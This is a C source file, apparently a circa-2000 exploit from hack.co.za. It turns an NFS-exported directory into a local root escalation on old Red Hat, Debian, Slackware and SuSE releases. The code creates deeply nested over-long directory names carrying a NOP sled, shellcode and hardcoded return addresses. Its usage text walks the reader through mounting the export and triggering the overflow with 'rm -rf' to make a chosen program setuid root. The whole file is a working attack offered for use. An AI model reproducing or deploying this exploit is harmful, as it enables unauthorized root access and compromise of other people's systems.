/* * * -> THIS IS VERY PRIVATE AND IS NOT TO BE DISTRIBUTED <- * * * author: tmoggie * greetz: * DiGiT - bug discovering, * kil3r, maxiu and all of lam3rZ GrP * */ #include #include #include #include #include #define green "\E[32m" #define bold "\E[1m" #define normal "\E[m" #define red "\E[31m" char shellcode[] = "\xeb\x2d\x5a\x21\xee\xae\x41\xcd\x80\xfe\x51\xeb\xd2\xad\xdb" "\xb1\xc0\xb0\x46\xcd\x80\xc9\xd2\xbe\xf3\xb0\xc0\xcd\x80\x66" "\xb9\xff\x09\x89\xf3\xb0\x0f\xcd\x80\x21\xdb\x89\xd8\xfe\xc0" "\x6a\xff\xff\xfa\x50\xcd\x80\xdb\x89\xd8\xfe\xc0\xae\xeb\xd2" "\xcd\x80\xe8\xce\xff\xff\xff\xff\xff\xff/"; char *cmd = "cp /bin/sh /tmp/blah"; int offset = 132; //default offset void usage(char *prog) { printf("\nusage: %s <-e dir> [-t target] [-c command] || %s <-h>\n",prog,prog); printf("\n -e dir : full path to exported directory\n"); printf(" -t target : "); printf("1 - RH 5.2 (default) 2 - Debian 2.1\n"); printf("3 - Slack 3.4 4 - Slack 3.6 2.1\n"); printf("5 - Slack 3.6, se 6 - SuSE 5.3\n"); printf("the rh 6.0 dosen't work atm :((((\n\n"); printf(" -c command: cmd to do as a normal user (default: cp /bin/sh /tmp/blah)\n"); printf(" -h : help, usage example\n\n"); exit(0); } void example(char *prog) { printf("Ok, let's say you wanna xploit Debian 2.1 with export:\n"); printf("\t/usr\t*(ro)\n"); printf("and you have some nice proggie which you want to make suid root:\n"); printf("\t/home/you/nice-proggie\n"); printf("If you have +w on /usr/tmp you have to do:\n"); printf("%s -e /usr/tmp -c \"cp /home/you/nice-proggie /tmp/blah\" -t 2\n", prog); printf("Next you have to mount the /usr on some box where you can do it;)\n"); printf("otherbox# mount -t nfs terget:/usr /mnt\n"); printf("otherbox# rm -rf /mnt/A[tab]\n\n"); printf("That's all...\n\n"); exit(0); } void main(int argc, char **argv) { int i,j; char buf[4096]; char buf2[4096]; char tmp[4096]; char exp[255] = "!"; int addr = 0xbffa3ad1 ; // RH 5.2 while (1) { i = getopt(argc,argv,"e:c:t:h"); if (i == -1) break; switch (i) { case 'e': strcpy(exp,optarg); break; case 'c': strcpy(cmd,optarg); break; case 't': switch (j=atoi(optarg)) { case 1: addr = 0xbffeb567; break; // debian 1.2 case 2: addr = 0xbffa3ad1; break; // rh 5.2 case 3: addr = 0xbff9b5af; break; // slack 3.4 case 4: addr = 0xbffef205; break; // slack 3.6, le case 5: addr = 0xbffef225; break; // slack 3.6, se case 6: addr = 0xbfff0a5f; break; // suse 5.3 // case 7: addr = 0xbfffe62f; break; // rh 6.0, dosen't work now :((( } case 'h': example(argv[0]); break; default : usage(argv[0]); break; } } if (!strcmp(exp,"!")) usage(argv[0]); printf(bold"cmd"); if (system(cmd) != 0) { printf(red"....failed!\n"normal); exit(-1); } printf(normal green"\tOk\n"normal); bzero(exp,sizeof(exp)); strncpy(exp,argv[1],strlen(argv[1])); offset = strlen(exp); if (exp[offset-1] != '/') strcat(exp,"/"); offset = strlen(exp); bzero(buf,sizeof(buf)); memset(tmp,'A',255); tmp[255]='/'; tmp[256]='\0'; strncpy(buf,exp,offset); printf(bold"dirs"); for (i=1;i<=3;i++) { strncat(buf,tmp,strlen(tmp)); if (mkdir(buf,0777) < 0) { printf(red"...fuck! can't create directory!!! : %d\n"normal,i); exit(-1); } } memset(tmp,'A',255); tmp[255-offset]='/'; tmp[256-offset]='\0'; strncat(buf,tmp,strlen(tmp)); if (mkdir(buf,0777) < 0) { printf(red"...fuqn offset dirW#$#@%#$^%T#\n"normal); exit(-1); } memset(tmp,'\x90',255); strcpy(tmp+(255-strlen(shellcode)),shellcode); strncat(buf,tmp,strlen(tmp)); if (mkdir(buf,0777) < 0) { printf(red"...fuck!@# shell-dir\n"normal); exit(-1); } memset(tmp,'a',255); tmp[97] = '\0'; *((int*)(tmp+93)) = addr; strncat(buf,tmp,strlen(tmp)); if (mkdir(buf,0777) < 0) { printf(red"...fuck!@#!@#!$ addrez-dir ^\n"normal); exit(-1); } printf(normal green"\tOk\n"normal); printf("now you have to do: "bold green \ "rm -rf /path-to-mount-point/A[tab] & \n\n"normal); } /* www.hack.co.za [2000]*/